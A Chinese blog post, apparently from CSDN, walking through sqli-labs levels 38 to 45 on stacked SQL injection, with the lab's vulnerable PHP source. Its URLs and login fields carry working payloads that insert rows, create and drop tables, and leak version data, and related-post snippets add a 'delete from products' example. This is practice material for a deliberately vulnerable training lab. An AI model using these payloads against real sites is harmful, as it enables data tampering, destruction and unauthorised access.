Sqllibs-less38-45-堆叠注入

最新推荐文章于 2024-03-02 20:46:57 发布
最新推荐文章于 2024-03-02 20:46:57 发布
阅读量401 收藏 1
点赞数
分类专栏: # Sqllibs_master
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43901038/article/details/107331250
版权

38、less38-stacked Query

38.1、注入分析

在这里插入图片描述
由源代码可以发现,闭合方式为单引号,且会输出数据库的报错信息,并且有数据库信息回显。这一关可以不需要使用堆叠注入,类似于平常的注入也可以,如下,使用的就是最简单的union注入。

http://192.168.10.208:8081/sqli-labs-master/Less-38/?id=0%27union select 1,database(),@@basedir--+

在这里插入图片描述
利用一下堆叠注入的原理,我们可以插入数据。

http://192.168.10.208:8081/sqli-labs-master/Less-38/?id=1%27;insert%20into%20users(id,username,password)%20values%20(%2738%27,%27less38%27,%27hello%27)--+

在这里插入图片描述

38.2、代码分析

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))//执行$sql针对数据库的查询
{	/*mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。*/
    

    /* store first result set */
    if ($result = mysqli_store_result($con1))
    {/*mysql_store_result()转移上一次查询返回的结果集*/
        if($row = mysqli_fetch_row($result))
        {
			echo '<font size = "5" color= "#00FF00">';	
			print_r("Your result is : %s", $result);
			echo "<br>";
            echo '<font size = "5" color= "#00FF00">';	
            printf("Your Username is : %s", $row[1]);
            echo "<br>";
            printf("Your Password is : %s", $row[2]);
            echo "<br>";
            echo "</font>";
        }
//            mysqli_free_result($result);
    }
        /* print divider */
    if (mysqli_more_results($con1))//检查查询是否有多个结果
    {/*mysqli_more_results() 函数检查一个多查询是否有更多的结果。*/
            //printf("-----------------\n");
    }
     //while (mysqli_next_result($con1));
}

39.less39-stacked Query Intiger type

39.1、注入分析

在这里插入图片描述
在这里插入图片描述
类似于less38,只是这一关为数字型,没有闭合方式,且会输出数据库的报错信息。

http://192.168.10.208:8081/sqli-labs-master/Less-39/?id=1;insert into users(id,username,password) values('21','less39','123456')--+

在这里插入图片描述

40、less40-stacked Query String type Blind

40.1、注入分析

在这里插入图片描述
本关类似于less38,只是闭合方式为单引号+括号,且不输出数据库的报错信息,因此无法产生数据库的报错信息,无法使用报错注入。

http://192.168.10.208:8081/sqli-labs-master/Less-40/?id=1');insert into users(id,username,password) values('22','less40','123456')--+

在这里插入图片描述

41.less41-stacked Query Intiger type Blind

41.1、注入分析

在这里插入图片描述
本关类似于less38,只是闭合方式为数字型,且不输出数据库的报错信息,因此无法产生数据库的报错信息,无法使用报错注入。

http://192.168.10.208:8081/sqli-labs-master/Less-41/?id=1;insert into users(id,username,password) values('23','less41','123456')--+

在这里插入图片描述

42.less42-Stacked Query error based

42.1、注入分析

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
从login.php源码可以发现,在登录的界面中,我们可以发现对于传入的username进行了过滤,而password没有做任何处理。

mysqli_real_escape_string(connection,escapestring);

参数描述
connection必需。规定要使用的 MySQL 连接。
escapestring必需。要转义的字符串。编码的字符是 NUL(ASCII 0)、\n、\r、\、’、" 和 Control-Z。

union注入
如下,对password进行尝试,发现可以登录。
在这里插入图片描述
接下来利用union注入进行登录:
在这里插入图片描述
登录后的结果,我们可以发现查询的语句显示在页面上了
在这里插入图片描述

stacked injection

在这里插入图片描述
利用stacked injection,我们可以执行创建一个新表的语句。如下构造:

SELECT * FROM users WHERE username='admin' and password='11';create table less42 like users #

在这里插入图片描述

利用11';drop table less42#作为登录密码,删除该表。
同样的利用此方式可以更新和插入数据项,这里就不进行演示了。

报错注入
在password中输入:11' and extractvalue(1,concat(0x7e,(select version()),0x7e))#
在这里插入图片描述

42.2、代码分析

如下是login.php的部分代码

	# Validating the user input........
	$username= $_SESSION["username"];
	$curr_pass= mysql_real_escape_string($_POST['current_password']);
	$pass= mysql_real_escape_string($_POST['password']);
	$re_pass= mysql_real_escape_string($_POST['re_password']);
	
	if($pass==$re_pass)
	{	
		$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
		$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
		$row = mysql_affected_rows();
		echo '<font size="3" color="#FFFF00">';
		echo '<center>';
		if($row==1)
		{
			//echo "Password successfully updated";
			echo '<img src="../images/password-updated.jpg">';
	
		}
		else
		{
			header('Location: failed.php');
			//echo 'You tried to be smart, Try harder!!!! :( ';
		}
	}

如下是pass_change.php的部分代码,我们可以发现在修改密码的位置,参数都用mysql_real_escape_string()函数进行了过滤,因此无法产生注入。
在这里插入图片描述

43.less43-Stacked Query

43.1、注入分析

在这里插入图片描述
在这里插入图片描述
本关类似于less42,只是将闭合方式改为了单引号+括号。
password:11');drop table less42

运行结果:
在这里插入图片描述

44.less44-Stacked Query Blind

44.1、注入分析

在这里插入图片描述
类似于less42,本关的闭合方式也是单引号闭合,但是不会输出数据库的报错信息,因此无法利用报错进行注入了,需要基于盲注。

username:admin
password:11’;insert into users(id,username,password) values(‘44’,‘less44’,‘less44’)#
在这里插入图片描述

插入成功。
在这里插入图片描述

45.less45-Stacked Query Blind based twist

45.1、注入分析

在这里插入图片描述
类似于less44,不会输出数据库的报错信息,但是闭合方式为单引号+括号,因此无法利用报错进行注入了,需要基于盲注。

username:admin
password:11’);insert into users(id,username,password) values(‘45’,‘less44’,‘less45’)#

xor0ne_10_01
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rollup-plugin-less:更少的汇总插件
04-29
npm install rollup - plugin - less -- save 用法 import './test.less' ; //generate css will be auto insert to the head tag if you set insert be true import { rollup } from 'rollup' ; import less from ...
Sqli-labs less 38
weixin_34062329的博客
08-11 173
Less-38 学习了关于stacked injection的相关知识,我们在本关可以得到直接的运用。 在执行select时的sql语句为:SELECT * FROM users WHERE id='$id' LIMIT 0,1 可以直接构造如下的payload: http://127.0.0.1/sqli-labs/Less-38/index.php?id=1%27;insert%20i...
SQL注入堆叠注入sql-lab第38关)
_Co1a
12-22 742
什么是堆叠注入SQL中,分号(;)是用来表示一条SQL语句结束的。试想一下我们在分号结束一个SQL语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而堆叠注入可以执行的是任意语句(增删改查)。 例如以下这个例子: 用户输入:1; delete from products服务器端生成的SQL语句为:select * from products where productid=1; delete from products当执行查询之后,第一条显示查询信息,第二条则是将整个表删除。
Sqli-labs靶场第14关详解[Sqli-labs-less-14]
最新发布
m0_73615178的博客
03-02 394
所以,payload分析输入一个username值然后使用双引号 " 闭合前面的语句,然后为了使where语句条件成立,加上一个or 1=1 ,-- 注释语句使后面的语句直接注释password不用判断。由于这题是post请求,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。当值为3时报错显示,所以列数为2,但是没有显示位,所以尝试报错注入。根据题目看,像一个登录页面,尝试使用布尔型盲注测试能否登录网站。根据返回值发现,如果登录成功将显示一个成功的图片。
sql-labs闯关38~45
qq_44663230的博客
09-07 1660
sql-labs 38~45 堆叠注入
sql注入堆叠注入
weixin_42566218的博客
02-19 8604
一、堆叠注入的原理 mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 比如我们在mysql的命令行界面执行一条查询语句,这时语句的结尾必须加上分号结束 select * from student; 如果我们想要执行多条sql那就用结束符分号进行隔开,比如在查询的同时查看当前登录用户是谁 select * from student;select current_user();
Sqlilabs-14
KAKA的博客
07-07 491
这里来到了第 14 关,题目是个忽悠,说是单引号+括号,整的跟 13 关一样但其实就是个大忽悠 在 Hackbar 上做注入,这一关 hackbar 又可以用了…这是属于哪波操作? uname=admin'&passwd=111&submit=submit 回显正常[这时你就知道题目忽悠人了] uname=admin"&passwd=111&submit=submit 回显报错[说明是双引号的人,没错了] uname=admin"#&passwd=111
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
postcss-less:用于解析LESS的PostCSS语法
05-13
poscss-less不是LESS编译器。 要编译LESS,请使用LESS的官方工具集。 安装 使用npm: npm install postcss-less --save-dev 如果您发现此模块有用,请考虑。 用法 无postcss-less的最常见用法是将PostCSS转换直接...
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
Marvell推出首款DRAM-less NVMe SSD控制器
01-20
迈威尔(Marvell)宣布推出首款 DRAM-less NVMe SSD 控制器,搭载先进的 NANDEdge 低密度奇偶校验技术(LDPC),支援 TLC (Triple-Level Cell) 与 3D NAND,适用于大众市场的行动运算解决方案。  Marvell 提供...
SQL注入-堆叠注入
m0_53820621的博客
08-15 1390
数据库支持堆叠查询,所谓堆叠查询就是执行多条语句,语句以;隔开。并且代码使用了支持堆叠查询的函数,列如PHP的。堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。堆叠注入后果很严重,可以直接对数据库增删改。...
Sqli-labs之Less:38-41
m0_46315342的博客
06-04 262
                                          &nbs...
Sqli-labs Less38-45 堆叠注入
kevinhanser
08-10 694
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 38: GET- Stacked Query Injection - String 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 测试 http://10.10.10.137/sqli-labs/Less-38/?id=...
sqli-labs】 less42 POST -Error based -String -Stacked(POST型基于错误的堆叠查询字符型注入)...
ajxi63204的博客
01-30 118
Forgot your password? New User click here? 看源码,可以发现和less 24不同的一点在于password字段没有进行转义处理 那就对password字段进行堆叠注入 login_user=1&login_password=1';insert into users(id,username,password) v...
《WEB安全渗透测试》(5)SQL注入实战:堆叠查询注入
午夜安全
10-03 6598
《WEB安全渗透测试》(5)SQL注入实战:堆叠查询注入 堆叠查询注入堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开。而堆叠查询注入攻击就是利用此特点,在第二条语句中构造自己要执行的语句。1)考虑使用堆叠注入访问URL:http://www.tianchi.com/web/duidie.php?id=1返回正常信息;访问URL:http://www.tianchi.com/web/duidie.php?id=1'返回错误信息......
sqli-labs-less-38~53
giun的博客
02-16 464
less-38~45主要介绍堆叠注入的方法 less-46~53介绍order by 后的注入 less-38 查看源码,我们可以知道 $sql=&quot;SELECT * FROM users WHERE id='$id' LIMIT 0,1&quot;; 我们使用堆叠注入 http://127.0.0.1/sqli-labs-master/Less-38/?id=1';insert into users va...
sqli-Labs————less-38
Fly_鹏程万里
05-20 953
Less-38源代码:&lt;?php error_reporting(0); include("../sql-connections/db-creds.inc"); ?&gt; &lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-tran...
SQL注入堆叠注入
07-15 936
SQL-堆叠注入
SQL注入实战:sqli-labs实验详解
在题目“less-1”中,通过将?id=1更改为?id=1'and1=1---,观察是否能触发错误或改变输出,来判断是否存在注入。当1=1变为1=2时,如果没有返回任何信息,这通常表明存在注入的可能性。接着,通过测试发现单引号(')是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值